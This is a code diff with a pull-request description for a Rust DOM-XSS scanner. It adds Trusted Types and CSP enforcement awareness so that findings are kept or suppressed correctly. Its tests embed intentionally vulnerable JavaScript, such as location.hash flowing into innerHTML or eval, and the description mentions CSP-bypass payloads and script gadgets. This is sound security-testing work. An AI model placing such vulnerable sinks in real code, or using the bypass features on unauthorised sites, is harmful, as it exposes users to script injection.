         // so parse it inline and skip the thread-spawn cost the common small
         // inline `<script>` block would otherwise pay on every call.
         if source_code.len() <= INLINE_PARSE_BYTES {
-            return Self::analyze_on_stack(source_code, script_element_ids);
+            return Self::analyze_on_stack(source_code, script_element_ids, trusted_types_enforced);
         }
 
         // Larger input may carry a deep multi-byte statement/assignment chain
@@ -4211,7 +4632,7 @@ impl AstDomAnalyzer {
             let handle = std::thread::Builder::new()
                 .stack_size(ANALYZE_STACK_BYTES)
                 .spawn_scoped(scope, move || {
-                    Self::analyze_on_stack(source_code, script_element_ids)
+                    Self::analyze_on_stack(source_code, script_element_ids, trusted_types_enforced)
                 });
             match handle {
                 // A panic inside the parse/walk (not a stack overflow, which
@@ -4234,6 +4655,7 @@ impl AstDomAnalyzer {
     fn analyze_on_stack(
         source_code: &str,
         script_element_ids: HashSet<String>,
+        trusted_types_enforced: bool,
     ) -> Result<Vec<DomXssVulnerability>, String> {
         let allocator = Allocator::default();
         let source_type = SourceType::default();
@@ -4245,8 +4667,9 @@ impl AstDomAnalyzer {
             return Err(format!("Parse errors: {}", error_messages.join(", ")));
         }
 
-        let mut visitor =
-            DomXssVisitor::new(source_code).with_script_element_ids(script_element_ids);
+        let mut visitor = DomXssVisitor::new(source_code)
+            .with_script_element_ids(script_element_ids)
+            .with_trusted_types_enforced(trusted_types_enforced);
         visitor.walk_statements(&ret.program.body);
 
         Ok(visitor.vulnerabilities)

--- a/src/scanning/ast_dom_analysis.rs
+++ b/src/scanning/ast_dom_analysis.rs
@@ -1200,18 +1200,18 @@ impl<'a> DomXssVisitor<'a> {
             };
             let call_src = self.expr_source(result.unwrap());
             let rest = body_src.replacen(call_src, "", 1);
-            if rest.contains(p) {
+            if Self::identifier_referenced(&rest, p) {
                 return TtStrictness::Permissive;
             }
             return TtStrictness::Strict;
         }
 
         // (2) No sanitizer: strict only when the parameter is never referenced in
-        //     the body (input isn't passed through). The substring check
-        //     over-counts references, so it only ever errs toward permissive.
+        //     the body (input isn't passed through). The token check only ever
+        //     errs toward permissive, so it never mislabels a passthrough.
         match param_name {
             Some(p) => {
-                if body_src.contains(p) {
+                if Self::identifier_referenced(body_src, p) {
                     TtStrictness::Permissive
                 } else {
                     TtStrictness::Strict
@@ -1219,6 +1219,38 @@ impl<'a> DomXssVisitor<'a> {
             }
             None => TtStrictness::Strict,
         }
+    }
+
+    /// Whether `name` appears in `src` as a standalone identifier token — i.e.
+    /// not as a substring inside a longer identifier/keyword. Bounded on both
+    /// sides by a non-identifier byte (`[A-Za-z0-9_$]`).
+    ///
+    /// A deliberately text-based (rather than AST-based) reference check: it
+    /// catches every real identifier reference (a JS identifier is always
+    /// delimited by non-identifier characters), so it never mislabels a genuine
+    /// passthrough as strict — preserving the no-false-negative guarantee. It is
+    /// stricter than a raw `contains`, so `param "s"` no longer matches inside
+    /// `sanitize` / `console` / `"processing"`, recovering the intended
+    /// false-positive suppression. (It does not strip string/comment contents;
+    /// a bare token there still matches, which only over-keeps a finding.)
+    fn identifier_referenced(src: &str, name: &str) -> bool {
+        if name.is_empty() {
+            return false;
+        }
+        let is_ident = |b: u8| b.is_ascii_alphanumeric() || b == b'_' || b == b'$';
+        let bytes = src.as_bytes();
+        let mut from = 0;
+        while let Some(rel) = src[from..].find(name) {
+            let start = from + rel;
+            let end = start + name.len();
+            let before_ok = start == 0 || !is_ident(bytes[start - 1]);
+            let after_ok = end == bytes.len() || !is_ident(bytes[end]);
+            if before_ok && after_ok {
+                return true;
+            }
+            from = start + 1;
+        }
+        false
     }
 
     /// Source text spanning a list of statements (first start .. last end),

--- a/src/scanning/ast_dom_analysis/tests.rs
+++ b/src/scanning/ast_dom_analysis/tests.rs
@@ -3923,3 +3923,338 @@ fn recursion_guard_caps_then_restores_depth() {
         "dropping the RAII guards must decrement the shared counter"
     );
 }
+
+// =========================================================================
+// Trusted Types awareness (issue #1097)
+// =========================================================================
+
+/// Helper: count DOM-XSS findings for `code`, with optional enforcement.
+fn tt_findings(code: &str, enforced: bool) -> Vec<DomXssVulnerability> {
+    AstDomAnalyzer::new()
+        .with_trusted_types_enforced(enforced)
+        .analyze(code)
+        .expect("analyze ok")
+}
+
+#[test]
+fn test_tt_strict_explicit_wrapper_clears_taint() {
+    // Routing the tainted value through a strict policy.createHTML — which
+    // returns a recognised sanitizer's output — is genuinely safe, so no
+    // finding. (Not gated on enforcement: the value is sanitized regardless.)
+    let code = r#"
+const policy = trustedTypes.createPolicy('p', { createHTML: s => DOMPurify.sanitize(s) });
+document.body.innerHTML = policy.createHTML(location.hash);
+"#;
+    assert!(
+        tt_findings(code, false).is_empty(),
+        "strict createHTML wrapper must clear taint"
+    );
+}
+
+#[test]
+fn test_tt_permissive_explicit_wrapper_keeps_finding() {
+    // A permissive `createHTML: x => x` is a no-op; the value reaching innerHTML
+    // is still attacker-controlled, so the finding must be kept (flagged).
+    let code = r#"
+const policy = trustedTypes.createPolicy('p', { createHTML: x => x });
+document.body.innerHTML = policy.createHTML(location.hash);
+"#;
+    let f = tt_findings(code, false);
+    assert!(
+        f.iter().any(|v| v.sink.contains("innerHTML")),
+        "permissive createHTML wrapper must NOT suppress the finding"
+    );
+}
+
+#[test]
+fn test_tt_permissive_explicit_wrapper_function_form() {
+    let code = r#"
+const policy = trustedTypes.createPolicy('p', { createHTML: function(s){ return s; } });
+el.innerHTML = policy.createHTML(location.search);
+"#;
+    assert!(
+        !tt_findings(code, false).is_empty(),
+        "an identity function-expression createHTML must keep the finding"
+    );
+}
+
+#[test]
+fn test_tt_method_shorthand_strict_wrapper_clears() {
+    // `createHTML(s) { return DOMPurify.sanitize(s); }` method shorthand.
+    let code = r#"
+const policy = trustedTypes.createPolicy('p', { createHTML(s) { return DOMPurify.sanitize(s); } });
+el.innerHTML = policy.createHTML(location.hash);
+"#;
+    assert!(
+        tt_findings(code, false).is_empty(),
+        "method-shorthand strict createHTML must clear taint"
+    );
+}
+
+#[test]
+fn test_tt_inline_chain_strict_clears() {
+    // Inline `createPolicy(...).createHTML(x)` chain (no variable binding).
+    let code = r#"
+el.innerHTML = trustedTypes.createPolicy('p', { createHTML: s => escapeHtml(s) }).createHTML(location.hash);
+"#;
+    assert!(
+        tt_findings(code, false).is_empty(),
+        "inline strict createPolicy().createHTML() chain must clear taint"
+    );
+}
+
+#[test]
+fn test_tt_inline_chain_permissive_keeps() {
+    let code = r#"
+el.innerHTML = trustedTypes.createPolicy('p', { createHTML: s => s }).createHTML(location.hash);
+"#;
+    assert!(
+        !tt_findings(code, false).is_empty(),
+        "inline permissive createPolicy().createHTML() chain must keep finding"
+    );
+}
+
+#[test]
+fn test_tt_strict_default_policy_suppresses_under_enforcement() {
+    // A strict 'default' policy auto-applies to every TrustedHTML sink when
+    // require-trusted-types-for is enforced → the raw-string sink is protected.
+    let code = r#"
+trustedTypes.createPolicy('default', { createHTML: s => DOMPurify.sanitize(s) });
+document.body.innerHTML = location.hash;
+"#;
+    assert!(
+        tt_findings(code, true).is_empty(),
+        "strict default policy under enforcement must suppress the TrustedHTML finding"
+    );
+}
+
+#[test]
+fn test_tt_strict_default_policy_kept_without_enforcement() {
+    // No require-trusted-types-for → the default policy is inert → finding kept.
+    // This is the critical no-false-negative guarantee.
+    let code = r#"
+trustedTypes.createPolicy('default', { createHTML: s => DOMPurify.sanitize(s) });
+document.body.innerHTML = location.hash;
+"#;
+    assert!(
+        !tt_findings(code, false).is_empty(),
+        "without enforcement a default policy is inert → finding must be kept"
+    );
+}
+
+#[test]
+fn test_tt_permissive_default_policy_kept_under_enforcement() {
+    // The headline case from #1097: createPolicy('default', {createHTML: x=>x})
+    // is a bypassable no-op — even with enforcement it provides no protection,
+    // so the finding must remain.
+    let code = r#"
+trustedTypes.createPolicy('default', { createHTML: x => x });
+document.body.innerHTML = location.hash;
+"#;
+    assert!(
+        !tt_findings(code, true).is_empty(),
+        "permissive default policy must be flagged, not treated as protection"
+    );
+}
+
+#[test]
+fn test_tt_default_suppression_only_covers_html_sinks() {
+    // A strict default createHTML guards TrustedHTML sinks only — it must NOT
+    // suppress a TrustedScript sink like eval (that needs createScript).
+    let code = r#"
+trustedTypes.createPolicy('default', { createHTML: s => DOMPurify.sanitize(s) });
+eval(location.hash);
+"#;
+    assert!(
+        tt_findings(code, true)
+            .iter()
+            .any(|v| v.sink.contains("eval")),
+        "default createHTML must not suppress a non-HTML (eval) sink"
+    );
+}
+
+#[test]
+fn test_tt_fn_guard_permissive_explicit_policy_blocks_default_suppression() {
+    // FN guard: a strict default policy would normally suppress, but the
+    // presence of a permissive explicit policy means a value could reach the
+    // sink as already-Trusted-but-unsanitized — so the finding is kept.
+    let code = r#"
+trustedTypes.createPolicy('default', { createHTML: s => DOMPurify.sanitize(s) });
+const weak = trustedTypes.createPolicy('weak', { createHTML: x => x });
+document.body.innerHTML = location.hash;
+"#;
+    assert!(
+        !tt_findings(code, true).is_empty(),
+        "a permissive explicit policy must disable default-policy suppression (no FN)"
+    );
+}
+
+#[test]
+fn test_tt_default_suppression_order_keeps_finding_when_policy_defined_after() {
+    // The sink executes before the policy is created → at sink time the default
+    // policy is not yet active → finding kept (correct and FN-safe).
+    let code = r#"
+document.body.innerHTML = location.hash;
+trustedTypes.createPolicy('default', { createHTML: s => DOMPurify.sanitize(s) });
+"#;
+    assert!(
+        !tt_findings(code, true).is_empty(),
+        "a default policy defined after the sink must not suppress it"
+    );
+}
+
+#[test]
+fn test_tt_window_prefixed_create_policy_recognised() {
+    let code = r#"
+const p = window.trustedTypes.createPolicy('p', { createHTML: s => DOMPurify.sanitize(s) });
+el.innerHTML = p.createHTML(location.hash);
+"#;
+    assert!(
+        tt_findings(code, false).is_empty(),
+        "window.trustedTypes.createPolicy must be recognised"
+    );
+}
+
+#[test]
+fn test_tt_unknown_custom_sanitizer_in_policy_is_permissive() {
+    // An unrecognised wrapper inside createHTML is conservatively permissive, so
+    // we keep the finding (no false negative on a custom, possibly-unsafe fn).
+    let code = r#"
+const p = trustedTypes.createPolicy('p', { createHTML: s => myCustomThing(s) });
+el.innerHTML = p.createHTML(location.hash);
+"#;
+    assert!(
+        !tt_findings(code, false).is_empty(),
+        "unrecognised createHTML body must stay permissive (keep finding)"
+    );
+}
+
+#[test]
+fn test_tt_no_policy_no_behavior_change() {
+    // Sanity: with no Trusted Types at all, enforcement flag changes nothing.
+    let code = r#"
+document.body.innerHTML = location.hash;
+"#;
+    assert_eq!(
+        tt_findings(code, true).len(),
+        tt_findings(code, false).len(),
+        "absent TT policies → enforcement flag must not change findings"
+    );
+    assert!(!tt_findings(code, true).is_empty());
+}
+
+#[test]
+fn test_tt_strict_create_script_wrapper_clears_eval() {
+    // createScript with a constant (no-param) body never returns the input, so
+    // it is strict → the eval sink is cleared.
+    let code = r#"
+const p = trustedTypes.createPolicy('p', { createScript: () => 'console.log(1)' });
+eval(p.createScript(location.hash));
+"#;
+    assert!(
+        tt_findings(code, false).is_empty(),
+        "strict createScript wrapper must clear the eval sink"
+    );
+}
+
+#[test]
+fn test_tt_strict_create_script_url_wrapper_clears_src() {
+    let code = r#"
+const s = document.createElement('script');
+const p = trustedTypes.createPolicy('p', { createScriptURL: () => 'https://cdn.example/a.js' });
+s.src = p.createScriptURL(location.hash);
+"#;
+    assert!(
+        tt_findings(code, false).is_empty(),
+        "strict createScriptURL wrapper must clear the src sink"
+    );
+}
+
+#[test]
+fn test_tt_permissive_create_script_wrapper_keeps_eval() {
+    let code = r#"
+const p = trustedTypes.createPolicy('p', { createScript: s => s });
+eval(p.createScript(location.hash));
+"#;
+    assert!(
+        !tt_findings(code, false).is_empty(),
+        "permissive createScript wrapper must keep the eval finding"
+    );
+}
+
+// --- Trusted Types classifier FN regression tests (review #1097) ----------
+
+#[test]
+fn test_tt_default_param_createhtml_is_permissive() {
+    // Regression: `(s = '') => s` is a default-parameter (AssignmentPattern), so
+    // the old `first_param_name` returned None and the body was misclassified as
+    // strict — suppressing a real finding. It is an identity passthrough and
+    // must stay permissive (finding kept) even under enforcement.
+    let code = r#"
+trustedTypes.createPolicy('default', { createHTML: (s = '') => s });
+document.body.innerHTML = location.hash;
+"#;
+    assert!(
+        !tt_findings(code, true).is_empty(),
+        "default-parameter identity createHTML must not be treated as strict"
+    );
+}
+
+#[test]
+fn test_tt_destructured_param_createhtml_is_permissive() {
+    let code = r#"
+const p = trustedTypes.createPolicy('p', { createHTML: ({ html }) => html });
+el.innerHTML = p.createHTML(location.hash);
+"#;
+    assert!(
+        !tt_findings(code, false).is_empty(),
+        "destructured-param createHTML can't be name-tracked → keep finding"
+    );
+}
+
+#[test]
+fn test_tt_guarded_raw_return_before_sanitizer_is_permissive() {
+    // Regression: a raw `return s` nested in an `if` precedes the top-level
+    // sanitizer return. The old single-first-return scan only saw the sanitizer
+    // and wrongly classified the policy strict, suppressing the finding.
+    let code = r#"
+const p = trustedTypes.createPolicy('p', {
+  createHTML(s) { if (window.unsafe) return s; return DOMPurify.sanitize(s); }
+});
+el.innerHTML = p.createHTML(location.hash);
+"#;
+    assert!(
+        !tt_findings(code, false).is_empty(),
+        "a guarded raw-passthrough return path must keep the policy permissive"
+    );
+}
+
+#[test]
+fn test_tt_concat_with_sanitizer_is_permissive() {
+    // `return DOMPurify.sanitize(s) + s` leaks the raw input alongside the
+    // sanitized output → permissive.
+    let code = r#"
+const p = trustedTypes.createPolicy('p', { createHTML: s => DOMPurify.sanitize(s) + s });
+el.innerHTML = p.createHTML(location.hash);
+"#;
+    assert!(
+        !tt_findings(code, false).is_empty(),
+        "concatenating raw input with sanitized output must stay permissive"
+    );
+}
+
+#[test]
+fn test_tt_sole_sanitizer_return_after_side_effect_is_strict() {
+    // A non-return statement before the sole sanitizer return must NOT block the
+    // strict classification — the returned value is still fully sanitized.
+    let code = r#"
+const p = trustedTypes.createPolicy('p', {
+  createHTML(s) { log('converting'); return DOMPurify.sanitize(s); }
+});
+el.innerHTML = p.createHTML(location.hash);
+"#;
+    assert!(
+        tt_findings(code, false).is_empty(),
+        "a sole sanitizer return after a side-effect statement is still strict"
+    );
+}

--- a/src/scanning/ast_integration.rs
+++ b/src/scanning/ast_integration.rs
@@ -680,24 +680,31 @@ pub fn analyze_javascript_for_dom_xss(
     String,
     String,
 )> {
-    analyze_javascript_for_dom_xss_with_html_context(js_code, _url, &HashSet::new())
+    analyze_javascript_for_dom_xss_with_html_context(js_code, _url, &HashSet::new(), false)
 }
 
 /// Same as `analyze_javascript_for_dom_xss`, but supplies the AST analyzer
 /// with the set of `<script>` element IDs observed in the surrounding HTML
 /// so inline `getElementById('id').innerText = tainted` shapes resolve to
 /// a JS-eval sink. Use `extract_script_element_ids(html)` to build the set.
+///
+/// `trusted_types_enforced` reflects the response CSP's
+/// `require-trusted-types-for 'script'`; when set, a strict `'default'`
+/// Trusted Types policy in the page suppresses the (now false-positive)
+/// TrustedHTML-sink findings it neutralizes.
 pub fn analyze_javascript_for_dom_xss_with_html_context(
     js_code: &str,
     _url: &str,
     script_element_ids: &HashSet<String>,
+    trusted_types_enforced: bool,
 ) -> Vec<(
     crate::scanning::ast_dom_analysis::DomXssVulnerability,
     String,
     String,
 )> {
     let analyzer = crate::scanning::ast_dom_analysis::AstDomAnalyzer::new()
-        .with_script_element_ids(script_element_ids.clone());
+        .with_script_element_ids(script_element_ids.clone())
+        .with_trusted_types_enforced(trusted_types_enforced);
 
     match analyzer.analyze(js_code) {
         Ok(vulnerabilities) => {
@@ -769,6 +776,7 @@ pub fn run_initial_ast_dom_analysis(
     response_text: &str,
     target_url: &str,
     target_method: &str,
+    trusted_types_enforced: bool,
 ) -> Vec<crate::scanning::result::Result> {
     let js_blocks = extract_javascript_from_html(response_text);
     let script_element_ids = extract_script_element_ids(response_text);
@@ -778,6 +786,7 @@ pub fn run_initial_ast_dom_analysis(
             &js_code,
             target_url,
             &script_element_ids,
+            trusted_types_enforced,
         );
         for (vuln, payload, description) in findings {
             let self_bootstrap_verified = has_self_bootstrap_verification(&js_code, &vuln.source);

--- a/src/scanning/ast_integration/tests.rs
+++ b/src/scanning/ast_integration/tests.rs
@@ -711,7 +711,7 @@ fn e2e_jquery_level1_constructor_finding_and_hash_poc() {
       if (target) { $(target).appendTo('#content'); }
     </script>
     </body></html>"#;
-    let results = run_initial_ast_dom_analysis(html, "http://t/jquery/level1/", "GET");
+    let results = run_initial_ast_dom_analysis(html, "http://t/jquery/level1/", "GET", false);
     assert!(
         results.iter().any(|r| r.evidence.contains("jQuery$")),
         "jQuery $() constructor must surface a finding; got {:?}",
@@ -746,7 +746,8 @@ fn e2e_codeexec_level1_dynamic_import_finding_and_data_uri_poc() {
       }
     </script>
     </body></html>"#;
-    let results = run_initial_ast_dom_analysis(html, "http://t/codeexec/level1/?query=a", "GET");
+    let results =
+        run_initial_ast_dom_analysis(html, "http://t/codeexec/level1/?query=a", "GET", false);
     assert!(
         results.iter().any(|r| r.evidence.contains("Sink: import")),
         "dynamic import() must surface a finding; got {:?}",
@@ -780,7 +781,7 @@ fn e2e_apidom_level1_fetch_innerhtml_finding() {
         .then(function (t) { document.getElementById('out').innerHTML = t; });
     </script>
     </body></html>"#;
-    let results = run_initial_ast_dom_analysis(html, "http://t/apidom/level1/?q=a", "GET");
+    let results = run_initial_ast_dom_analysis(html, "http://t/apidom/level1/?q=a", "GET", false);
     assert!(
         results
             .iter()
@@ -807,7 +808,7 @@ fn e2e_apidom_level3_xhr_innerhtml_finding() {
       xhr.send();
     </script>
     </body></html>"#;
-    let results = run_initial_ast_dom_analysis(html, "http://t/apidom/level3/?q=a", "GET");
+    let results = run_initial_ast_dom_analysis(html, "http://t/apidom/level3/?q=a", "GET", false);
     assert!(
         results.iter().any(
             |r| r.evidence.contains("Source: XMLHttpRequest.responseText")

--- a/src/scanning/mod.rs
+++ b/src/scanning/mod.rs
@@ -438,12 +438,14 @@ async fn run_ast_dom_analysis(
     let js_blocks = crate::scanning::ast_integration::extract_javascript_from_html(response_text);
     let script_element_ids =
         crate::scanning::ast_integration::extract_script_element_ids(response_text);
+    let trusted_types_enforced = target.trusted_types_enforced();
     for js_code in js_blocks {
         let findings =
             crate::scanning::ast_integration::analyze_javascript_for_dom_xss_with_html_context(
                 &js_code,
                 target.url.as_str(),
                 &script_element_ids,
+                trusted_types_enforced,
             );
         for (vuln, payload, description) in findings {
             let self_bootstrap_verified =
@@ -582,6 +584,7 @@ pub(crate) async fn fetch_and_analyze_external_js(
         crate::scanning::ast_integration::extract_same_origin_script_srcs(html, &target.url);
 
     let script_element_ids = crate::scanning::ast_integration::extract_script_element_ids(html);
+    let trusted_types_enforced = target.trusted_types_enforced();
     let mut results: Vec<crate::scanning::result::Result> = Vec::new();
 
     // extract_same_origin_script_srcs already deduplicates; just cap the count.
@@ -620,6 +623,7 @@ pub(crate) async fn fetch_and_analyze_external_js(
                 &body,
                 target.url.as_str(),
                 &script_element_ids,
+                trusted_types_enforced,
             );
 
         for (vuln, payload, description) in findings {
@@ -858,6 +862,24 @@ fn compute_waf_strategy(
             Some(crate::waf::bypass::merge_strategies(&waf_types))
         }
     })
+}
+
+/// Whether the response headers carry an **enforcing** CSP with
+/// `require-trusted-types-for 'script'`. Used by the server / MCP surfaces —
+/// which fetch the page directly rather than through the preflight stage — to
+/// give the initial AST DOM analysis the same Trusted Types awareness the CLI
+/// path derives from `target.csp_analysis`.
+///
+/// The report-only variant (`Content-Security-Policy-Report-Only`) is
+/// deliberately ignored: it only emits violation reports and enforces nothing,
+/// so the browser does not route sinks through the default policy. Treating it
+/// as enforcement would suppress genuine findings (a false negative).
+pub fn csp_requires_trusted_types(headers: &reqwest::header::HeaderMap) -> bool {
+    headers
+        .get("content-security-policy")
+        .and_then(|v| v.to_str().ok())
+        .map(|v| crate::payload::xss_csp_bypass::analyze_csp(v).require_trusted_types_for)
+        .unwrap_or(false)
 }
 
 /// Pre-merge the payloads shared across every parameter: CSP-bypass payloads

--- a/src/scanning/tests.rs
+++ b/src/scanning/tests.rs
@@ -1774,3 +1774,33 @@ async fn test_accumulate_findings_empty_batch_is_noop() {
         "results vec must remain empty for empty batch"
     );
 }
+
+// --- csp_requires_trusted_types (server/MCP TT enforcement gate) ----------
+
+#[test]
+fn test_csp_requires_trusted_types_enforcing_header() {
+    let mut headers = reqwest::header::HeaderMap::new();
+    headers.insert(
+        "content-security-policy",
+        "require-trusted-types-for 'script'".parse().unwrap(),
+    );
+    assert!(super::csp_requires_trusted_types(&headers));
+}
+
+#[test]
+fn test_csp_requires_trusted_types_ignores_report_only() {
+    // Report-only enforces nothing, so it must NOT signal TT enforcement —
+    // otherwise a real DOM-XSS finding would be wrongly suppressed (FN).
+    let mut headers = reqwest::header::HeaderMap::new();
+    headers.insert(
+        "content-security-policy-report-only",
+        "require-trusted-types-for 'script'".parse().unwrap(),
+    );
+    assert!(!super::csp_requires_trusted_types(&headers));
+}
+
+#[test]
+fn test_csp_requires_trusted_types_absent() {
+    let headers = reqwest::header::HeaderMap::new();
+    assert!(!super::csp_requires_trusted_types(&headers));
+}

--- a/src/server/job_runner.rs
+++ b/src/server/job_runner.rs
@@ -487,32 +487,39 @@ pub(crate) async fn run_scan_job(
                     // fails the regular scan path below still runs.
                     if !args.skip_ast_analysis {
                         let client = target.build_client_or_default();
-                        if let Ok(resp) = client.get(target.url.clone()).send().await
-                            && let Ok(body) = resp.text().await
-                        {
-                            let ast_batch =
-                                crate::scanning::ast_integration::run_initial_ast_dom_analysis(
-                                    &body,
-                                    target.url.as_str(),
-                                    &target.method,
-                                );
-                            if !ast_batch.is_empty() {
-                                let added = ast_batch.len();
-                                let mut guard = results.lock().await;
-                                guard.extend(ast_batch);
-                                findings_count
-                                    .fetch_add(added, std::sync::atomic::Ordering::Relaxed);
+                        if let Ok(resp) = client.get(target.url.clone()).send().await {
+                            // Read CSP off the response before the body is
+                            // consumed, so a `require-trusted-types-for` page is
+                            // analyzed with the same Trusted Types awareness the
+                            // CLI gets from preflight.
+                            let trusted_types_enforced =
+                                crate::scanning::csp_requires_trusted_types(resp.headers());
+                            if let Ok(body) = resp.text().await {
+                                let ast_batch =
+                                    crate::scanning::ast_integration::run_initial_ast_dom_analysis(
+                                        &body,
+                                        target.url.as_str(),
+                                        &target.method,
+                                        trusted_types_enforced,
+                                    );
+                                if !ast_batch.is_empty() {
+                                    let added = ast_batch.len();
+                                    let mut guard = results.lock().await;
+                                    guard.extend(ast_batch);
+                                    findings_count
+                                        .fetch_add(added, std::sync::atomic::Ordering::Relaxed);
+                                }
+                                let ext_batch = crate::scanning::fetch_and_analyze_external_js(
+                                    &client, &target, &body, &args,
+                                )
+                                .await;
+                                crate::scanning::accumulate_findings(
+                                    &results,
+                                    &findings_count,
+                                    ext_batch,
+                                )
+                                .await;
                             }
-                            let ext_batch = crate::scanning::fetch_and_analyze_external_js(
-                                &client, &target, &body, &args,
-                            )
-                            .await;
-                            crate::scanning::accumulate_findings(
-                                &results,
-                                &findings_count,
-                                ext_batch,
-                            )
-                            .await;
                         }
                     }
 

--- a/src/target_parser/mod.rs
+++ b/src/target_parser/mod.rs
@@ -103,6 +103,16 @@ impl Target {
         self.method.parse().unwrap_or(reqwest::Method::GET)
     }
 
+    /// Whether this target's (enforcing) CSP requires Trusted Types
+    /// (`require-trusted-types-for 'script'`). Drives the AST DOM analyzer's
+    /// strict-default-policy suppression. False when no CSP was analysed or the
+    /// captured policy was report-only (neutralised at analysis time).
+    pub fn trusted_types_enforced(&self) -> bool {
+        self.csp_analysis
+            .as_ref()
+            .is_some_and(|c| c.require_trusted_types_for)
+    }
+
     /// Cache key derived from the Target fields that affect Client construction.
     fn client_cache_key(&self) -> ClientCacheKey {
         (


### PR DESCRIPTION
Closes #1097.

Makes the CSP analyzer act on modern directives (`has_strict_dynamic` was parsed but dead) and adds Trusted Types awareness to the AST DOM-XSS analyzer.

## Changes

**CSP analyzer (`src/payload/xss_csp_bypass.rs`)**
- `strict-dynamic` is now live: emits DOM script-gadgets (RequireJS `data-main`, `document.write` self-propagation, AngularJS bootstrap) + a `<script nonce=…>` reuse payload when a nonce is captured. Under strict-dynamic the browser-ignored host-allowlist gadgets are correctly skipped.
- Parses `'nonce-…'` / `'sha256|384|512-…'` tokens and the `require-trusted-types-for` / `trusted-types` directives into `CspAnalysis`.
- Classifies a nonce/hash-only policy as **hardened** vs **gadget-bypassable** (`is_nonce_or_hash_based` / `is_gadget_bypassable` / `is_hardened`). A per-response random nonce is hardened, not bypassable.

**Embedded gadget DB (`src/payload/gadget_db.rs`, new)**
- Replaces the hardcoded 6-branch CDN allowlist with an extensible static registry of public JSONP/script-gadget shapes (JSONBee / H5SC / Google CSP-Evaluator).

**AST Trusted Types awareness (`src/scanning/ast_dom_analysis.rs`)**
- Tracks `trustedTypes.createPolicy(...)` definitions and classifies each `create*` callback strict vs permissive (conservative — anything not provably safe stays permissive).
- A **strict** `policy.createHTML/Script/ScriptURL(x)` wrapper clears taint; a **permissive** `createPolicy('default', {createHTML: x=>x})` is flagged, not mistaken for protection.
- A strict `'default'` policy suppresses TrustedHTML-sink findings **only** under real enforcement, threaded from the response CSP (`require-trusted-types-for`). Report-only never enforces. Enforcement reaches server/MCP via a new `scanning::csp_requires_trusted_types(headers)` helper.

## No regression (FN / FP / speed)
- **FN:** suppression fires only on genuinely-safe (true-negative) flows; the classifier errs toward permissive. Three FN edges found in self-review were fixed with regression tests (report-only CSP, default/destructured params, sanitizer return masking a guarded raw passthrough).
- **FP:** Trusted Types suppression only reduces FPs; CSP payloads reuse the existing marker/verification path.
- **Speed:** targets without CSP are untouched; TT paths fast-return when enforcement is off; extra payloads are bounded and only emitted for bypassable CSP shapes.

## Tests / docs
- +70 unit tests (gadget DB, CSP parsing/classification/payloads, Trusted Types incl. FN regressions).
- `cargo test` green (1557 lib + 199 integration), `clippy` clean, `fmt` clean.
- Docs: new "CSP-aware bypass payloads" and "Trusted Types awareness" sections in `docs/content/guide/payloads.md`.